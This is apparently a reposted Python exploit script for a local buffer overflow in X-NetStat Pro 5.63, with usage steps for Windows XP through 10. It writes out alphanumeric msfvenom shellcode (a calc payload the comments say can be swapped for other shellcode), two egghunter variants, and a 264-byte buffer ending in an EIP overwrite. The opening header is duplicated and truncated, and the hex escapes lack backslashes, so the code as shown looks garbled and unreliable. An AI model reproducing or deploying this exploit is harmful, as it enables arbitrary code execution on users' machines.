#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHu #!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-23 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Vendor Homepage: https://freshsoftware.com #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe #
# Version: 5.63 #
# Special Thanks to my wife #
# The program has Local Buffer Overflow in several places. #
# Note: Although there are even more simple codes to this vulnerability, #
# this technique (EggHunter) has been used to run vulnerability in different windows versions. #
# Steps : #
# 1- Run python code : X-NetStat.py ( Three files are created ) #
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" #
# --> Enter --> Close HTTP Client window. #
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok #
# --> Wait a litle --> Shellcode (Calc) open #
# Also Instead of the third stage you can : #
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --> #
# Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#---------------------------------------------------------------------------------------------------------#
#------------------------------------ EGG Shellcode Generation ---------------------------------------
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
egg = "w00tw00t"
egg += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
egg += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
egg += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
egg += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
egg += "x79x6cx5ax48x4ex62x77x70x57x70x63x30x71"
egg += "x70x4bx39x5ax45x35x61x4fx30x52x44x4cx4b"
egg += "x52x70x46x50x6cx4bx53x62x54x4cx6cx4bx43"
egg += "x62x44x54x6cx4bx71x62x51x38x34x4fx6ex57"
egg += "x31x5ax36x46x55x61x6bx4fx4cx6cx37x4cx75"
egg += "x31x73x4cx45x52x54x6cx77x50x49x51x48x4f"
egg += "x34x4dx53x31x69x57x39x72x4ax52x62x72x43"
egg += "x67x6ex6bx71x42x52x30x4cx4bx70x4ax47x4c"
egg += "x6ex6bx62x6cx62x31x72x58x6ax43x70x48x33"
egg += "x31x4ex31x52x71x4cx4bx36x39x37x50x63x31"
egg += "x5ax73x4cx4bx42x69x52x38x68x63x57x4ax31"
egg += "x59x4ex6bx44x74x4cx4bx55x51x38x56x50x31"
egg += "x6bx4fx6ex4cx69x51x78x4fx46x6dx36x61x58"
egg += "x47x46x58x4bx50x52x55x39x66x65x53x71x6d"
egg += "x79x68x45x6bx31x6dx45x74x34x35x7ax44x52"
egg += "x78x4cx4bx62x78x77x54x47x71x58x53x75x36"
egg += "x6cx4bx34x4cx70x4bx6cx4bx52x78x35x4cx43"
egg += "x31x58x53x6cx4bx73x34x6ex6bx67x71x58x50"
egg += "x6cx49x73x74x45x74x55x74x63x6bx61x4bx33"
egg += "x51x32x79x51x4ax36x31x49x6fx4bx50x71x4f"
egg += "x71x4fx42x7ax6cx4bx44x52x48x6bx6ex6dx31"
egg += "x4dx50x6ax35x51x6ex6dx6fx75x48x32x55x50"
egg += "x75x50x53x30x46x30x55x38x74x71x4cx4bx72"
egg += "x4fx4ex67x69x6fx6bx65x4dx6bx5ax50x38x35"
egg += "x79x32x56x36x45x38x59x36x6ax35x6fx4dx6f"
egg += "x6dx69x6fx59x45x35x6cx64x46x31x6cx76x6a"
egg += "x4bx30x79x6bx4bx50x74x35x73x35x4dx6bx73"
egg += "x77x65x43x71x62x32x4fx50x6ax75x50x31x43"
egg += "x39x6fx5ax75x55x33x43x51x72x4cx45x33x44"
egg += "x6ex62x45x31x68x62x45x63x30x41x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
#--------------------------------- EGG Hunter Shellcode Generation -----------------------------------
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "x4cx4cx4cx4cx5f"
egghunter += "x57x59x49x49x49x49x49x49x49x49x49x49"
egghunter += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
egghunter += "x50x30x41x35x41x6bx41x46x51x32x41x47"
egghunter += "x32x42x47x30x42x47x41x42x58x50x38x41"
egghunter += "x47x75x4ax49x56x51x6bx62x75x36x4ex6c"
egghunter += "x48x4bx6bx30x59x6bx34x63x64x35x33x38"
egghunter += "x45x61x49x4bx36x33x50x53x70x53x43x63"
egghunter += "x38x33x6fx30x43x56x4ex61x48x4ax79x6f"
egghunter += "x44x4fx30x42x72x72x6bx30x59x6bx39x50"
egghunter += "x30x74x67x78x52x4ax77x72x50x58x48x4d"
egghunter += "x56x4ex71x4ax7ax4bx35x42x70x6ax67x56"
egghunter += "x42x78x56x51x6bx79x6fx79x68x62x72x44"
egghunter += "x59x6fx67x63x62x7ax6bx33x45x6cx57x54"
egghunter += "x75x50x62x54x67x71x31x4ax75x6cx67x75"
egghunter += "x74x34x38x56x4fx48x44x37x30x30x74x70"
egghunter += "x31x64x6cx49x4ax77x6ex4fx64x35x68x51"
egghunter += "x6cx6fx33x45x48x4ex59x6fx6dx37x41x41"
# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "x4cx4cx4cx4cx5f"
egghunter10 += "x57x59x49x49x49x49x49x49x49x49x49"
egghunter10 += "x49x49x49x49x49x49x49x37x51x5ax6a"
egghunter10 += "x41x58x50x30x41x35x41x6bx41x46x51"
egghunter10 += "x32x41x47x32x42x47x30x42x47x41x42"
egghunter10 += "x58x50x38x41x47x75x4ax49x4dx53x4a"
egghunter10 += "x4cx46x50x69x57x56x64x76x44x55x50"
egghunter10 += "x37x70x55x50x73x30x48x47x43x74x55"
egghunter10 += "x74x35x54x57x70x47x70x35x50x65x50"
egghunter10 += "x78x47x67x34x77x54x76x68x35x50x55"
egghunter10 += "x50x53x30x45x50x66x51x4ax72x61x76"
egghunter10 += "x4cx4cx58x4bx6fx70x6bx4bx61x33x50"
egghunter10 += "x75x63x32x4cx73x4fx30x70x66x4bx31"
egghunter10 += "x6ax6ax49x6fx64x4fx62x62x73x62x4d"
egghunter10 += "x50x69x6bx79x50x30x74x64x4bx53x58"
egghunter10 += "x6bx76x63x31x75x50x37x70x70x58x5a"
egghunter10 += "x6dx54x6ex52x7ax68x6bx67x61x30x31"
egghunter10 += "x49x4bx73x63x51x43x30x53x32x4ax71"
egghunter10 += "x39x63x68x38x33x49x50x51x74x69x6f"
egghunter10 += "x66x73x6dx53x7ax64x66x6cx42x7ax55"
egghunter10 += "x6cx47x75x71x64x49x44x78x38x72x57"
egghunter10 += "x66x50x74x70x31x64x4fx79x4bx67x4c"
egghunter10 += "x6fx70x75x78x4fx6ex4fx44x35x48x4c"
egghunter10 += "x6bx4fx68x67x41x41"
eip = "x77x5ax46"
buffer = egghunter + "x41" * (264 - len(egghunter)) + eip # Direct Eip Overflow
f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "x41" * (264 - len(egghunter10)) + eip # Direct Eip Overflow
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()
X-NetStat Pro 5.63 Local Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 298